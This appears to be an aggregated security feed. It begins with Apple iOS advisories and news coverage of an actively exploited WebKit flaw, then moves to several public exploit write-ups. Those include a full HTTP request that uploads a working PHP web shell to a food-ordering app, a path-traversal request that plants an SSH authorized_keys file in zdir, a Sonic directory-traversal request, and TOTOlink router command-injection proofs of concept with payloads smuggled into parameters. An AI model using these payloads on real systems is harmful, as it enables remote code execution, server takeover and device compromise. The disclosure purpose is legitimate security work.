Apple Security Advisory 2023-01-23-3 - iOS 12.5.7 addresses a code execution vulnerability.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2023-01-23-3 iOS 12.5.7iOS 12.5.7 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT213597.WebKitAvailable for: iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPadmini 2, iPad mini 3, and iPod touch (6th generation)Impact: Processing maliciously crafted web content may lead toarbitrary code execution. Apple is aware of a report that this issuemay have been actively exploited against versions of iOS releasedbefore iOS 15.1.Description: A type confusion issue was addressed with improved statehandling.WebKit Bugzilla: 248266CVE-2022-42856: Clément Lecigne of Google's Threat Analysis GroupThis update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/  iTunes and Software Update on thedevice will automatically check Apple's update server on its weeklyschedule. When an update is detected, it is downloaded and the optionto be installed is presented to the user when the iOS device isdocked. We recommend applying the update immediately if possible.Selecting Don't Install will present the option the next time youconnect your iOS device.  The automatic update process may take up toa week depending on the day that iTunes or the device checks forupdates. You may manually obtain the update via the Check for Updatesbutton within iTunes, or the Software Update on your device.  Tocheck that the iPhone, iPod touch, or iPad has been updated:  *Navigate to Settings * Select General * Select About. The versionafter applying this update will be "iOS 12.5.7".All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmPPIl4ACgkQ4RjMIDkeNxk+Gw//TvgmHpZaxvWNFgNweQ3WivIf4JesoYk2EkUMLU04+HcPm+0cPQqG9fBXkFtmRYvbkb2i3Bhf9NSy5rA5kJ+XRdRalnQCoQ7A1YppUZvjgrOzjf5AsWcFJDB1cjuIcKhyhqPlyIHGM2/O57WUhYrkDWTybvNiD2s6V9B8sWhiOdMJ4U4eUXl0mR14KF8OauxIoZsaxAd1XIch8W8GffjTi+Kd2uDji59JYJndKakdNmy793bKrJWRUrGakeKttpBKMr1U834+x0pOcMkUwpY/Yo5DECKGLkpZlFHW0kZpFAckhvpEXYF5yrEWwURiMx1+3G6GgNQeoAj0DhVZMu+FtkpzjZVtZIm1KWWUhIQklUpsyxg612CukSxZoQYkjkWhYIH6vlrPvlc1nnZJd2vsV6xyhGk0a1ZCwMr8mRvAzy6S2wHnfoyBrqy/yHa7PnsGlmRt2Y7qyOJ+UO47AgvM8M0or9BJwyGVhj9sqeKFDC0Yjs1XWB8pg9W9KGf+3Kb4oxth6asxlI9IRiIYeGYD/zKftuCZ+Pc2suwZqWaTAJR1wk1tXCdTgFjyu9z7dfRAJyrc5lPbOOPLxyG1evtvtGXmj7zcSJVAHRH4MUxgbu/KxbkkRXTGmBqXCFu26QnzxFpEJYV/j2w9pmmKT7JjCFDw2G5wYJtbzTX+lLP1o+E==j70k-----END PGP SIGNATURE-----

Apple Security Advisory 2023-01-23-3

Apple Security Advisory 2023-01-23-1 - iOS 16.3 and iPadOS 16.3 addresses bypass, code execution, and information leakage vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2023-01-23-1 iOS 16.3 and iPadOS 16.3iOS 16.3 and iPadOS 16.3 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT213606.AppleMobileFileIntegrityAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to access user-sensitive dataDescription: This issue was addressed by enabling hardened runtime.CVE-2023-23499: Wojciech Reguła (@_r3ggi) of SecuRing(wojciechregula.blog)ImageIOAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: Processing an image may lead to a denial-of-serviceDescription: A memory corruption issue was addressed with improvedstate management.CVE-2023-23519: Yiğit Can YILMAZ (@yilmazcanyigit)KernelAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to leak sensitive kernel stateDescription: The issue was addressed with improved memory handling.CVE-2023-23500: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte.Ltd. (@starlabs_sg)KernelAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to determine kernel memory layoutDescription: An information disclosure issue was addressed byremoving the vulnerable code.CVE-2023-23502: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte.Ltd. (@starlabs_sg)KernelAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to execute arbitrary code with kernelprivilegesDescription: The issue was addressed with improved memory handling.CVE-2023-23504: Adam Doupé of ASU SEFCOMMail DraftsAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: The quoted original message may be selected from the wrongemail when forwarding an email from an Exchange accountDescription: A logic issue was addressed with improved statemanagement.CVE-2023-23498: an anonymous researcherMapsAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to bypass Privacy preferencesDescription: A logic issue was addressed with improved statemanagement.CVE-2023-23503: an anonymous researcherSafariAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: Visiting a website may lead to an app denial-of-serviceDescription: The issue was addressed with improved handling ofcaches.CVE-2023-23512: Adriatik RaciScreen TimeAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to access information about a user’scontactsDescription: A privacy issue was addressed with improved private dataredaction for log entries.CVE-2023-23505: Wojciech Reguła of SecuRing (wojciechregula.blog)WeatherAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to bypass Privacy preferencesDescription: The issue was addressed with improved memory handling.CVE-2023-23511: Wojciech Regula of SecuRing (wojciechregula.blog), ananonymous researcherWebKitAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: Processing maliciously crafted web content may lead toarbitrary code executionDescription: The issue was addressed with improved checks.WebKit Bugzilla: 245464CVE-2023-23496: ChengGang Wu, Yan Kang, YuHao Hu, Yue Sun, JimingWang, JiKai Ren and Hang Shu of Institute of Computing Technology,Chinese Academy of SciencesWebKitAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: Processing maliciously crafted web content may lead toarbitrary code executionDescription: The issue was addressed with improved memory handling.WebKit Bugzilla: 248268CVE-2023-23518: YeongHyeon Choi (@hyeon101010), Hyeon Park(@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung),JunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIEWebKit Bugzilla: 248268CVE-2023-23517: YeongHyeon Choi (@hyeon101010), Hyeon Park(@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung),JunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIEAdditional recognitionKernelWe would like to acknowledge Nick Stenning of Replicate for theirassistance.ShortcutsWe would like to acknowledge Baibhav Anand Jha from ReconWithMe andCristian Dinca of Tudor Vianu National High School of ComputerScience, Romania for their assistance.WebKitWe would like to acknowledge Eliya Stein of Confiant for theirassistance.This update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/  iTunes and Software Update on thedevice will automatically check Apple's update server on its weeklyschedule. When an update is detected, it is downloaded and the optionto be installed is presented to the user when the iOS device isdocked. We recommend applying the update immediately if possible.Selecting Don't Install will present the option the next time youconnect your iOS device.  The automatic update process may take up toa week depending on the day that iTunes or the device checks forupdates. You may manually obtain the update via the Check for Updatesbutton within iTunes, or the Software Update on your device.  Tocheck that the iPhone, iPod touch, or iPad has been updated:  *Navigate to Settings * Select General * Select About. The versionafter applying this update will be "iOS 16.3 and iPadOS 16.3".All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmPPIl4ACgkQ4RjMIDkeNxniSRAAoaTuBBV5jk91bJapaGf/pqZV+h9vAV9B7sHzBRaJRq5fnoEm+Kdg6fS4XZtTWhB9NXekrujHVMZC/AvboChvc94r1/qoF6vhVu1YYaDJkryFMlX4lbk5Jz7hk3gXHCpdARbburX46g0Fi9M6bL6dzG/6f4LG9L27dno5G/lcjHY9ylSnHHwuFcva7kH2os9FmD3JMiopLwNKymfN1Z5AgC9TrDfztOcUChULBSxtx3eOP1+HWbpuQ6govnEzAnnpoBl09f7EMfgGu4FpZiThsfFUCXNkdl23E+i8PrdRWW17Nqoqrnvb74pFjWOaelBBCdNee7TpfgfkGKT/PVADdoLdYmB5tqowvNWBfJ7ymB0Cir9BX74Iu0ldOcV49WJO4tr5swBF/Tgqx/k8dl8gj56g4tq+O+5TZZS42ep0l5JKgbpQtcGtujMZCagKnA1+TM53yaSX6CJG/B09PnIUIow3jsx+FQlCUPo1Nl/kDWKLcZ7C9dIHjgaVZ9SZ5g0nalb5J4BY6wjuq/46FTewOH0bpGj5j992cNYM4aYUBDWvziXnlawuFzrw/tzA8xO2DUTpNPDdxixVfAIn9cp/VXK1mrj5BEGYXphvog+5E4vGDx9Ejth9qOSlzf1GlpaiipDI/bUjUz+A664r7/y88ulO8xB0xaANzr3xjwWI5JA==sqSC-----END PGP SIGNATURE-----

Apple Security Advisory 2023-01-23-1

Apple has backported fixes for a recently disclosed critical security flaw affecting older devices, citing evidence of active exploitation.
The issue, tracked as CVE-2022-42856, is a type confusion vulnerability in the WebKit browser engine that could result in arbitrary code execution when processing maliciously crafted web content.
While it was originally addressed by the company on November

Mobile Security / 0-Day Attack

Apple has backported fixes for a recently disclosed critical security flaw affecting older devices, citing evidence of active exploitation.

The issue, tracked as CVE-2022-42856, is a type confusion vulnerability in the WebKit browser engine that could result in arbitrary code execution when processing maliciously crafted web content.

While it was originally addressed by the company on November 30, 2022, as part of iOS 16.1.2 update, the patch was expanded to a broader set of Apple devices with iOS 15.7.2, iPadOS 15.7.2, macOS Ventura 13.1, tvOS 16.2, and Safari 16.2.

"Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.1," the iPhone maker said in an advisory published Monday.

To that end, the latest update, iOS 12.5.7, is available for iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, and iPod touch (6th generation).

Clément Lecigne of Google's Threat Analysis Group (TAG) has been credited with discovering the vulnerability, although exact specifics surrounding the exploitation attempts in the wild are currently unknown.

The update comes as Apple released iOS 16.3, iPadOS 16.3, macOS Ventura 13.2, watchOS 9.3, and Safari 16.3 to remediate a long list of security flaws, including two bugs in WebKit that could lead to code execution.

macOS Ventura 13.2 also plugs two denial-of-service vulnerabilities in ImageIO and Safari, alongside three flaws in the Kernel that could be abused to leak sensitive information , determine its memory layout, and execute rogue code with elevated privileges.

It's not all bug fixes, though. The updates also bring with them the ability to use hardware security keys to lock down Apple IDs for phishing-resistant two-factor authentication. They also expand the availability of Advanced Data Protection outside of the U.S.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Apple Issues Updates for Older Devices to Fix Actively Exploited Vulnerability

Categories: Apple
Categories: Exploits and vulnerabilities
Categories: News
Tags: iOS 12.5.7

Tags:  CVE-2022-42856

Tags:  type confusion

Tags:  WebKit

Apple has now released security content for iOS 12.5.7 which includes a patch for an actively exploited vulnerability in WebKit and many other updates.



(Read more...)




The post Own an older iPhone? Check you're on the latest version to avoid this bug appeared first on Malwarebytes Labs.

In December, 2022, we warned our readers about an actively exploited vulnerability in Apple’s WebKit. Back then we wondered why Apple specifically stated that the issue may have been actively exploited against versions of iOS released before iOS 15.1.

At the time, our resident Apple expert Thomas Reed said that Apple has been known to release fixes for older systems when it is aware of active attacks taking place. And indeed, Apple has now released security content for iOS 12.5.7. which includes a patch for this vulnerability.

**Affected devices**

The patch is available for: iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, and iPod touch (6th generation).

The update may already have reached your device during your regular update routines, but it doesn't hurt to check if your device is at the latest update level.

Here's how to update your iPhone or iPad.

Since the vulnerability we’ll discuss below is already being exploited, it's important that you install the update your devices as soon as you can, if you haven’t already.

**The vulnerability**

The bug (CVE-2022-42856) was found in WebKit which is Apple’s web rendering engine. In other words, WebKit is the browser engine that powers Safari and other apps.

Apple says the impact of the vulnerability is that processing maliciously crafted web content may lead to arbitrary code execution. In essence this means an attacker can try to lure his victims to a malicious site to compromise their devices. But Apple has not disclosed any details about the circumstances under which the vulnerability was actively exploited.

**Other updates**

There is also new security content for  iOS 15.7.2 and iPadOS 15.7.2 and security updates for a lot of other Apple software.

Own an older iPhone? Check you're on the latest version to avoid this bug

Food Ordering System version 2 suffers from a remote shell upload vulnerability.

## Title: Food Ordering System v2 File upload Vulnerability + web-shell upload - RCE## Author: nu11secur1ty## Date: 01.23.2023## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Food-Ordering-System-v2.0## Description:The Food Ordering System v2 suffers from, File Upload and web-shellupload RCE Vulnerabilities.The upload function for the background image hover of this system isnot sanitizing correctly.The attacker can upload some RCE malicious code and easily destroythis system. The status of this system is awful!## STATUS: HIGH Vulnerability[+] Exploit:```GETPOST /fos/admin/ajax.php?action=save_settings HTTP/1.1Host: pwnedhost.comContent-Length: 6157Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryqYQLHPx3VuntGH7WOrigin: http://pwnedhost.comReferer: http://pwnedhost.com/fos/admin/index.php?page=site_settingsAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=598nahp235ehmk2broafrh37qqConnection: close------WebKitFormBoundaryqYQLHPx3VuntGH7WContent-Disposition: form-data; name="name"Online Food Ordering System V2------WebKitFormBoundaryqYQLHPx3VuntGH7WContent-Disposition: form-data; name="email"info@sample.com------WebKitFormBoundaryqYQLHPx3VuntGH7WContent-Disposition: form-data; name="contact"+6948 8542 623------WebKitFormBoundaryqYQLHPx3VuntGH7WContent-Disposition: form-data; name="about"<p style="text-align: center; background: transparent; position:relative;"><span style="font-size:28px;background: transparent;position: relative;">ABOUT US</span></b></span></p><pstyle="text-align: center; background: transparent; position:relative;"><span style="background: transparent; position: relative;font-size: 14px;"><span style="font-size:28px;background: transparent;position: relative;"><b style="margin: 0px; padding: 0px; color:rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif;text-align: justify;">Lorem Ipsum</b><span style="color: rgb(0, 0, 0);font-family: "Open Sans", Arial, sans-serif; font-weight:400; text-align: justify;">&nbsp;is simply dummy text of the printingand typesetting industry. Lorem Ipsum has been the industry&#x2019;sstandard dummy text ever since the 1500s, when an unknown printer tooka galley of type and scrambled it to make a type specimen book. It hassurvived not only five centuries, but also the leap into electronictypesetting, remaining essentially unchanged. It was popularised inthe 1960s with the release of Letraset sheets containing Lorem Ipsumpassages, and more recently with desktop publishing software likeAldus PageMaker including versions of LoremIpsum.</span><br></span></b></span></p><p style="text-align: center;background: transparent; position: relative;"><span style="background:transparent; position: relative; font-size: 14px;"><spanstyle="font-size:28px;background: transparent; position:relative;"><span style="color: rgb(0, 0, 0); font-family: "OpenSans", Arial, sans-serif; font-weight: 400; text-align:justify;"><br></span></b></span></p><p style="text-align: center;background: transparent; position: relative;"><span style="background:transparent; position: relative; font-size: 14px;"><spanstyle="font-size:28px;background: transparent; position:relative;"><h2 style="font-size:28px;background: transparent;position: relative;">Where does it come from?</h2><pstyle="text-align: center; margin-bottom: 15px; padding: 0px; color:rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif;font-weight: 400;">Contrary to popular belief, Lorem Ipsum is notsimply random text. It has roots in a piece of classical Latinliterature from 45 BC, making it over 2000 years old. RichardMcClintock, a Latin professor at Hampden-Sydney College in Virginia,looked up one of the more obscure Latin words, consectetur, from aLorem Ipsum passage, and going through the cites of the word inclassical literature, discovered the undoubtable source. Lorem Ipsumcomes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum etMalorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC.This book is a treatise on the theory of ethics, very popular duringthe Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sitamet..", comes from a line in section1.10.32.</p></span></b></span></p>------WebKitFormBoundaryqYQLHPx3VuntGH7WContent-Disposition: form-data; name="img"; filename="pic.php"Content-Type: image/jpeg<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><html>  <head>    <meta http-equiv="Content-Type" content="text/html" charset="euc-kr">    <title>PHP Web Shell Ver 4.0 by nu11secur1ty</title>    <script type="text/javascript">      function FocusIn(obj)      {        if(obj.value == obj.defaultValue)          obj.value = '';      }            function FocusOut(obj)      {        if(obj.value == '')          obj.value = obj.defaultValue;      }    </script>  </head>  <body>    <b>WebShell's Location = http://<?php echo $_SERVER['HTTP_HOST'];echo $_SERVER['REQUEST_URI'] ?></b><br><br>        HTTP_HOST = <?php echo $_SERVER['HTTP_HOST'] ?><br>    REQUEST_URI = <?php echo $_SERVER['REQUEST_URI'] ?><br>        <br>        <form name="cmd_exec" method="post" action="http://<?php echo$_SERVER['HTTP_HOST']; echo $_SERVER['REQUEST_URI'] ?>">      <input type="text" name="cmd" size="70" maxlength="500"value="Input command to execute"onfocus="FocusIn(document.cmd_exec.cmd)"onblur="FocusOut(document.cmd_exec.cmd)">      <input type="submit" name="exec" value="exec">    </form>    <?php      if(isset($_POST['exec']))      {        exec($_POST['cmd'],$result);        echo '----------------- < OutPut > -----------------';        echo '<pre>';        foreach($result as $print)        {          $print = str_replace('<','<',$print);          echo $print . '<br>';        }        echo '</pre>';      }      else echo '<br>';    ?>        <form enctype="multipart/form-data" name="file_upload" method="post"action="http://<?php echo $_SERVER['HTTP_HOST']; echo$_SERVER['REQUEST_URI'] ?>">      <input type="file" name="file">      <input type="submit" name="upload" value="upload"><br>      <input type="text" name="target" size="100" value="Location wherefile will be uploaded (include file name!)"onfocus="FocusIn(document.file_upload.target)"onblur="FocusOut(document.file_upload.target)">    </form>    <?php      if(isset($_POST['upload']))      {        $check = move_uploaded_file($_FILES['file']['tmp_name'], $_POST['target']);                if($check == TRUE)          echo '<pre>The file was uploaded successfully!!</pre>';        else          echo '<pre>File Upload was failed...</pre>';      }    ?>  </body></html>------WebKitFormBoundaryqYQLHPx3VuntGH7W--```[+] Response:```HTTPHTTP/1.1 200 OKDate: Mon, 23 Jan 2023 12:27:44 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0X-Powered-By: PHP/8.2.0Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 1Connection: closeContent-Type: text/html; charset=UTF-81```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Food-Ordering-System-v2.0)## Reference:[href](https://portswigger.net/web-security/file-upload)## Proof and Exploit:[href](https://www.youtube.com/watch?v=t7RnRFnXTP4)## Proof and Exploit:[href](https://streamable.com/c026hq)## Time spent`01:00:00`

Food Ordering System 2 Shell Upload

An arbitrary file upload vulnerability in the /api/upload component of zdir v3.2.0 allows attackers to execute arbitrary code via a crafted .ssh file.

**The steps to reproduce.**

zdir version: 3.2.0

    git clone https://github.com/helloxz/zdir
    
    go run main.go init
    
    

modify file: /zdir/data/config/config.ini

start

View routes, the interface requires login credentials  

Enter the controller.Mkdir method, the parameters submitted by the post request are name and path  

Enter the !V\_dir method and find that it is only to judge whether the passed path is a folder

This creates a .ssh directory using directory traversal

    POST /api/dir/create HTTP/1.1
    Host: 127.0.0.1:6080
    Content-Length: 28
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96"
    X-Token: 433a01baeaa6c37ef46f21621cc06f95
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Content-Type: application/x-www-form-urlencoded;charset=UTF-8
    Accept: application/json, text/plain, */*
    X-Cid: bPlNFG
    sec-ch-ua-platform: "Linux"
    Origin: http://127.0.0.1:6080
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://127.0.0.1:6080/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: USERNAME=admin; CID=bPlNFG; TOKEN=433a01baeaa6c37ef46f21621cc06f95
    Connection: close
    
    path=/../../../../&name=.ssh
    

Enter the controller.Upload method, you can specify the upload path  

There is a loophole in the regex to determine whether the path is legal, and you can use /../ to bypass it

Determine whether the folder exists, and terminate execution if it does not exist. So use the above directory traversal to create a folder, and then upload the file name without renaming it.  

    POST /api/upload HTTP/1.1
    Host: 127.0.0.1:6080
    Content-Length: 897
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96"
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqjo68lEJ6LlJ8zdA
    X-Token: 433a01baeaa6c37ef46f21621cc06f95
    X-Cid: bPlNFG
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    sec-ch-ua-platform: "Linux"
    Accept: */*
    Origin: http://127.0.0.1:6080
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://127.0.0.1:6080/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: USERNAME=admin; CID=bPlNFG; TOKEN=433a01baeaa6c37ef46f21621cc06f95
    Connection: close
    
    ------WebKitFormBoundaryqjo68lEJ6LlJ8zdA
    Content-Disposition: form-data; name="path"
    
    /../../../../../../home/kali/.ssh
    ------WebKitFormBoundaryqjo68lEJ6LlJ8zdA
    Content-Disposition: form-data; name="file"; filename="authorized_keys"
    Content-Type: text/plain
    
    ssh-rsa
    
    ------WebKitFormBoundaryqjo68lEJ6LlJ8zdA--
    

Generate an ssh public key for upload  

Then you can use ssh to connect to the server

CVE-2023-23314: File upload ssh authorized_keys causes RCE · Issue #90 · helloxz/zdir

An issue in the component /admin/backups/work-dir of Sonic v1.0.4 allows attackers to execute a directory traversal.

Need to log in to the background  
Back up files in any directory through directory traversal

    POST /api/admin/backups/work-dir HTTP/1.1
    Host: 127.0.0.1:8080
    Content-Length: 35
    Admin-Authorization: 0996683e-0fab-46ec-936d-953d43be8048
    Accept: application/json, text/plain, */*
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96"
    sec-ch-ua-platform: "Linux"
    Content-Type: application/json
    Origin: http://127.0.0.1:8080
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://127.0.0.1:8080/admin/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    ["../../../../home/kali/Documents"]

CVE-2022-46959: Back up files in any directory through directory traversal · Issue #56 · go-sonic/sonic

TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the servername parameter in the setting/delStaticDhcpRules function.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取servername参数下的内容传递给v7，之后将v7带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/delStaticDhcpRules",
"servername":"1$(ls>/tmp/123;)"}

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

CVE-2022-48123: ttt/15 at main · Am1ngl/ttt

TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the FileName parameter in the setting/setOpenVpnCertGenerationCfg function.

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/setOpenVpnCertGenerationCfg",
"FileName":"1$(ls>/tmp/123;)"}

CVE-2022-48124: ttt/14 at main · Am1ngl/ttt

TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the password parameter in the setting/setOpenVpnCertGenerationCfg function.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取password参数下的内容传递给v26，之后将v26传递给v28，最后将v28带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/setOpenVpnCertGenerationCfg",
"password":"1$(ls>/tmp/123;)"}

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

Tag

#webkit